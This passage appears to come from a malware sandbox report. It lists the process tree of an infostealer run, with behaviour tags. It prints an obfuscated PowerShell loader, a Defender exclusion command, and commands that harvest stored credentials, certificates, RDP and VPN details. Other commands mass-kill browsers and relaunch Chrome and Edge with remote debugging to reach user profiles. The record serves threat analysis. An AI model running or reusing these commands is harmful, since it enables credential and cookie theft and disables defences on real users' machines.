Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3112
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
- - C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
    "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    PID:4084
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2447497384.txt\""
      4⤵
      NTFS ADS
      PID:1676
  - - C:\Windows\system32\net.exe
      "net" statistics workstation
      4⤵
      PID:2776
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        5⤵
        
        PID:1168
  - - C:\Windows\system32\vaultcmd.exe
      "vaultcmd" /list
      4⤵
      PID:4416
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2904
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4164
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FO CSV /NH
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4984
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list
      4⤵
      PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3668
    - - C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        5⤵
        
        PID:3848
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1716
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2592
  - - C:\Windows\system32\certutil.exe
      "certutil" -store My
      4⤵
      PID:492
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4652
  - - C:\Windows\system32\certutil.exe
      "certutil" -store -user My
      4⤵
      PID:3392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4072
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4504
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
      4⤵
      Command and Scripting Interpreter: PowerShell
      Hide Artifacts: Ignore Process Interrupts
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4844
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2300
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list
      4⤵
      PID:4068
  - - C:\Windows\system32\cmdkey.exe
      "cmdkey" /list:TERMSRV/69.48.201.74
      4⤵
      PID:4716
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5024
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3876
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4524
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM chrome.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3556
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM msedge.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2684
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1676
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM brave.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:436
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1072
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM opera.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\system32\tasklist.exe
      "tasklist"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3160
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM vivaldi.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3052
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM firefox.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:864
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM dragon.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:456
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM Discord.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:468
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM maxthon.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2248
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM DiscordCanary.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2908
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM uc_browser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2348
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM DiscordPTB.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1420
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM slimjet.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2928
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM DiscordDevelopment.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM cent_browser.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2916
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM epic.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3004
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM torch.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1560
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM whale.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3936
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM 360browser.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4524
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM qqbrowser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1020
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM browser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3912
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      PID:4388
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM msedge.exe
      4⤵
      Kills process with taskkill
      PID:3224
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM brave.exe
      4⤵
      Kills process with taskkill
      PID:4468
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM opera.exe
      4⤵
      Kills process with taskkill
      PID:4220
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM vivaldi.exe
      4⤵
      Kills process with taskkill
      PID:3264
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:2800
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM dragon.exe
      4⤵
      PID:4544
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM maxthon.exe
      4⤵
      Kills process with taskkill
      PID:2684
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM uc_browser.exe
      4⤵
      PID:1020
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM slimjet.exe
      4⤵
      Kills process with taskkill
      PID:4844
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM cent_browser.exe
      4⤵
      Kills process with taskkill
      PID:2628
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM epic.exe
      4⤵
      Kills process with taskkill
      PID:4780
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM torch.exe
      4⤵
      Kills process with taskkill
      PID:4292
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM whale.exe
      4⤵
      Kills process with taskkill
      PID:2600
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM 360browser.exe
      4⤵
      Kills process with taskkill
      PID:3328
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM qqbrowser.exe
      4⤵
      Kills process with taskkill
      PID:4772
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM browser.exe
      4⤵
      Kills process with taskkill
      PID:2392
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq chrome.exe"
      4⤵
      Enumerates processes with tasklist
      PID:3664
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41611 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:4716
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaab51dcf8,0x7ffaab51dd04,0x7ffaab51dd10
        5⤵
        
        PID:1420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2468,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2460 /prefetch:2
        5⤵
        Modifies registry class
        
        PID:2600
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2388,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2200 /prefetch:3
        5⤵
        
        PID:2236
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2944,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2936 /prefetch:8
        5⤵
        
        PID:1344
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=1652,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2428 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4048
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2956 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4208
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41611 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2860,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3324 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3852
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4536,i,313199026885629898,4001311542350120719,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4532 /prefetch:8
        5⤵
        
        PID:5504
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq chrome.exe"
      4⤵
      Enumerates processes with tasklist
      PID:6068
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      PID:6132
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq msedge.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5056
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41460 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious use of FindShellTrayWindow
      PID:808
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x354,0x7ffaace1f208,0x7ffaace1f214,0x7ffaace1f220
        5⤵
        
        PID:3992
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=1996,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1988 /prefetch:2
        5⤵
        Modifies registry class
        
        PID:5636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2692,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:3
        5⤵
        
        PID:5984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2840,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2852 /prefetch:8
        5⤵
        
        PID:3080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3188,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3476 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4068,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --no-sandbox --remote-debugging-port=41460 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,9866287474672228136,2369596848319737377,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:3240
  - - C:\Windows\system32\tasklist.exe
      "tasklist" /FI "IMAGENAME eq msedge.exe"
      4⤵
      Enumerates processes with tasklist
      PID:3152
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM chrome.exe
      4⤵
      Kills process with taskkill
      PID:6220
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM msedge.exe
      4⤵
      Kills process with taskkill
      PID:6332
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM brave.exe
      4⤵
      Kills process with taskkill
      PID:6396
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM opera.exe
      4⤵
      Kills process with taskkill
      PID:6456
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM vivaldi.exe
      4⤵
      Kills process with taskkill
      PID:6532
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM firefox.exe
      4⤵
      Kills process with taskkill
      PID:5448
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM dragon.exe
      4⤵
      PID:6756
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM maxthon.exe
      4⤵
      Kills process with taskkill
      PID:6848
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM uc_browser.exe
      4⤵
      PID:2144
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM slimjet.exe
      4⤵
      Kills process with taskkill
      PID:3524
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM cent_browser.exe
      4⤵
      PID:5848
  - - C:\Windows\system32\taskkill.exe
      "taskkill" /IM epic.exe
      4⤵
